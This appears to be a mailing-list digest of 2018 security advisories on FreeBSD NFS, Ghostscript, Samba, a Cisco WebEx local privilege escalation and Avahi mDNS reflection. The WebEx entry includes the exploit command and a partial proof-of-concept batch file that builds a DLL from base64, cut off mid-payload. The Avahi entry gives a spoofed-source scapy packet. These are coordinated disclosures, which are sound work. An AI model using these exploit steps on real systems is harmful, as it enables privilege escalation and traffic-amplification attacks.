FreeBSD Security Advisory FreeBSD-SA-18:13.nfs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:13.nfsSecurity Advisory The FreeBSD Project Topic: Multiple vulnerabilities in NFS server code Category: core Module: nfs Announced: 2018-11-27 Credits:Jakub Jirasek, Secunia Research at Flexera Affects:All supported versions of FreeBSD. Corrected: 2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE) 2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5) CVE Name: CVE-2018-17157, CVE-2018-17158, CVE-2018-17159 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Network File System (NFS) allows a host to export some or all of its file systems so that other hosts can access them over the network and mount them as if they were local. FreeBSD includes both server and client implementations of NFS. II. Problem Description Insufficient and improper checking in the NFS server code could cause a denial of service or possibly remote code execution via a specially crafted network packet. III. Impact A remote attacker could cause the NFS server to crash, resulting in a denial of service, or possibly execute arbitrary code on the server. IV. Workaround No workaround is available, but systems that do not provide NFS services are not vulnerable. Additionally, it is highly recommended the NFS service port (default port number 2049) is protected via a host or network based firewall to prevent arbitrary, untrusted clients from being able to connect. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch # fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc # gpg --verify nfs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r340854 releng/11.2/ r341088 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://www.flexerasoftware.com/enterprise/company/about/secunia-research/> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlv9n85fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKJEg//Umbe1QOUgV0Z6EsdlQffNMo9MHbAz75vCqeaibI36Ng9vmkLKGlS6nCA 5mKFS+BvM5CkekBaiQ6BR8t0xWsrFwX6JCUayQ2FsCSo4rwCZms3AIbvt68vjQAm xWuQIMJzYku5+kALtcXXvVkLhMCaioVDpZmuPCO+rY79OVM4xP1MsnTfqEZSNo+n Cz2urH4eO60YsM8w05coQ3hnOsUjTCk8yCh3+R/uYK1VouLDgD8q96T1eG2ozny6 vwEMK3AjmcpvFkTIF3/2I6TTA5K+Zd+nqzhzPM5HjbLZmdQV02NHcoGaZrK1wsQw D+3wf8icBMfLt9rTUbEqVdvg5FRDkTo8/dH1wY85gWZ2wsSgCqI2wRuqBH4bp3bb Gcf2+D4vgX6YY5cZ/wFDcYWpghhrmXUbgnH7PnyVfYB0Ufta9utgMOQKMS0mUWwM DlHP+fL/A8lhPvXIhl1DtSa/TQAiAdMG1JwktzThKrUzjL8bntmjoqtr1Xcp2txJ
[SECURITY] [DSA 4346-1] ghostscript security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4346-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso November 27, 2018 https://www.debian.org/security/faq - - Package: ghostscript CVE ID : CVE-2018-19409 CVE-2018-19475 CVE-2018-19476 CVE-2018-19477 Several vulnerabilities were discovered in Ghostscript, the GPL PostScript/PDF interpreter, which may result in denial of service or the execution of arbitrary code if a malformed Postscript file is processed (despite the -dSAFER sandbox being enabled). This update rebases ghostscript for stretch to the upstream version 9.26 which includes additional changes. For the stable distribution (stretch), these problems have been fixed in version 9.26~dfsg-0+deb9u1. We recommend that you upgrade your ghostscript packages. For the detailed security status of ghostscript please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ghostscript Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlv9yK5fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Sl8g/9GnHpR7PrP47xykdjn5kJnepTk3xCknUC9xSZol0MAJ+jfHf92BnxUhD2 kOQvFlFVoQGdxcoieQ8YFue+1k2MHSJyVi/oyngwRt41qxPj0Nua0UKk/eGfIlQ/ HsAWHcPgjJF1nMC84oiwFzEUPVoH+hY1yxIFATIAWFU9wdKD7IoUF4MTzbCpfuMp nhK9eTJA0PQoHYH9c3VHSkHPtcV6nLvgR4RUC9UPkJtKKvp8zGIaXObjr9DkrlDI pztcryAI/Hwoj99ZEpZXpuDGZArp4Ndm1FFqS0M+oPWezBFBd9Z4cWiLwjEeOtfR nR43jcY/vElIn6qsIHQSI4RRfpu3WUCPGZDtZn17CIzIA1v0ODfKD16zIR+tau5b j89frAABclSCFIAJn61OP8RqQE/fArG5EjL8uyEQDeiwdQh+ce717NKUX4YK9Z21 2pWSa022BxT490+pFKmKGPgdFdVEdz/uj/+qBaNKmt5YcWH3OyisyGv3Yn4QCcZf fZAbGQ4y+4A9LbHtD5R6e6g7tipUQWyHcKxsTrD+AIfIZcKIB7BTpAJhcEZJCDk6 QX2DFA+g6AwIQqIC+/0JW5amjU0SZM1N3fVVFc9hoiOqEGtAUzjMQ9deBapkbPon Nh7Z8HViCx6j1gfNjhPc2Wj+Fw1wkEC2fjG1Mrd00izIXtj7isI= =xNXq -END PGP SIGNATURE-
[CORE-2018-0011] - Cisco WebEx Meetings Elevation of Privilege Vulnerability
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ Cisco WebEx Meetings Elevation of Privilege Vulnerability *1. *Advisory Information** Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Advisory ID: CORE-2018-0011 Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability Date published: 2018-11-27 Date of last update: 2018-11-27 Vendors contacted: Cisco Release mode: Coordinated release *2. *Vulnerability Information** Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-15442 *3. *Vulnerability Description** Cisco's Webex Meetings website states that [1]: Cisco Webex Meetings: Simply the Best Video Conferencing and Online Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters. A vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows could allow a local attacker to elevate privileges. This vulnerability is related to a previous security issue fixed by Cisco in October. *4. *Vulnerable Packages* *. Cisco Webex Meetings Desktop App releases prior to 33.6.4 . Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6 *5. *Vendor Information, Solutions and Workarounds** Cisco released a new fixed version and updated its security notice: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection *6. *Credits** This vulnerability was discovered and researched by Marcos Accossatto from SecureAuth Exploits' Writers Team. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** *7.1. *Privilege Escalation** [CVE-2018-15442] The update service of Cisco Webex Meetings Desktop App for Windows does not properly validate user-supplied parameters. An unprivileged local attacker could exploit this vulnerability by invoking the update service command with a crafted argument. This will allow the attacker to run arbitrary commands with SYSTEM user privileges. The vulnerability can be exploited by copying to an a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 "attacker-controlled-path" (if the parameter 1 doesn't work, then 2 should be used) Proof of Concept: /- REM Contents of PoC.bat REM This batch will copy the ptUpdate.exe from the installation folder to the current folder REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll REM Finally, the webexservice service will be started, with the showed parameters REM The result should be a notepad.exe with SYSTEM user privileges @echo off :CheckOS IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT) :64BIT copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" . GOTO END :32BIT copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" . GOTO END :END echo TVqQAAME//8AALgAQAAAsA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAABQRQAATAEEALCa5 > dll.txt echo VsAAOAADiELAQUMAAIGABAQIAAAEAAQAgAABAQEAABQBAAA3GEAAAIAABAAABAAEAAAEBBgIAAANQggAAAoAEwAAA >> dll.txt echo AAIAAACC50ZXh0nQAQAgQAACAAAGAucmRhdGEAAJUAIAIGAABAAABALmRhdGEQADACCAAAQAAAwC5yZWxvYwAAGAB >> dll.txt echo AAgoAAEAAAEIA >> dll.txt echo A >> dll.txt echo FWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA6AoAAAC4AQAAAMnCDADM/yUAIAAQVYvsi1UIi0UQi00MwekFg/ >> dll.txt echo
Avahi 0.7 missing link-local checks in Legacy Unicast Responses cause information disclosure and makes DDoS with mDNS traffic reflection possible
Hi! Avahi-daemon in Avahi through 0.7 inadvertently sends Legacy Unicast Responses to IPv4 unicast queries with source addresses that are not link-local, which allows remote attackers to cause a denial of service (traffic amplification) or obtain potentially sensitive information via port-5353 UDP packets. send(IP(src="1.1.1.1",dst="192.168.1.1")/UDP(sport=53, dport=5353)/DNS(rd=1,qd=DNSQR(qtype="PTR", qname="_ssh._tcp.local."))) Author was notified by his bug tracker: https://github.com/lathiat/avahi/issues/203 Regards, -- Krzysztof Burghardt http://www.burghardt.pl/
[SECURITY] [DSA 4345-1] samba security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4345-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso November 27, 2018 https://www.debian.org/security/faq - - Package: samba CVE ID : CVE-2018-14629 CVE-2018-16841 CVE-2018-16851 Several vulnerabilities have been discovered in Samba, a SMB/CIFS file, print, and login server for Unix. The Common Vulnerabilities and Exposures project identifies the following issues: CVE-2018-14629 Florian Stuelpner discovered that Samba is vulnerable to infinite query recursion caused by CNAME loops, resulting in denial of service. https://www.samba.org/samba/security/CVE-2018-14629.html CVE-2018-16841 Alex MacCuish discovered that a user with a valid certificate or smart card can crash the Samba AD DC's KDC when configured to accept smart-card authentication. https://www.samba.org/samba/security/CVE-2018-16841.html CVE-2018-16851 Garming Sam of the Samba Team and Catalyst discovered a NULL pointer dereference vulnerability in the Samba AD DC LDAP server allowing a user able to read more than 256MB of LDAP entries to crash the Samba AD DC's LDAP server. https://www.samba.org/samba/security/CVE-2018-16851.html For the stable distribution (stretch), these problems have been fixed in version 2:4.5.12+dfsg-2+deb9u4. We recommend that you upgrade your samba packages. For the detailed security status of samba please refer to its security tracker page at: https://security-tracker.debian.org/tracker/samba Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlv9KLpfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Qw+xAAnLGnQAqs45jCSDuVeKzjOGDZcz2/PQOtRDINDJ1AoBJz9YeIP83hqVb4 gJ3ZW/efuciS670xqRGFEkGHIIt8Wh+YtCsfblbY6xatmG/z5iNK7C12H0SH3A9+ 0k6GR9LHQ/uRTuBEtE+ggfx/uhhHw6zZWu+NIXHHIdK7c2j9/Wz1+CJjkfkbGfPa G9lk0uxuK6Yy+p4PhUtcMVdBHW1zbeODYj/qcSNULm9OSXCXy/L0zDdbblS8qAql OYAsNAnnVt3JMIG8eYfCaibX61xW//ViIRfbg0qLoe91Zn0rt3S2piY9003fkSD4 h+2PnmUSZ8EyBb5HUFTMuGdB6jSMVZBtmDH+A9dSVHKB663HlRGIP74Ro4T9yp8t 07+HCA15KRTisjCgHSeURUkRLKJYN1ceFitXhOFNa+Tg/EOxCh1uNLGqHIHL0g+5 w5VVf6HQNc+GoDy6xxTAAu3yI2HmiYwG3QWKvRTrzNNEWD4GMeKug3+RiP8Ipcc9 4PpCk9rsqzLl2LzFhfqEKC33pZ9go73zVkWzDkzhYA5pB+YWvJMWlDs6WD9L10qT jbjC1txBVfgEoM5zJuXXDAM9eSiIaQeW2399B5QnUqImMMGQQc+ci3YtkPFoRMIm pWTtSheRA/wnDQf4VU0o21Q8zOU0uc9EoIGZZiC1f5Q2ZPAkcEE= =GZz7 -END PGP SIGNATURE-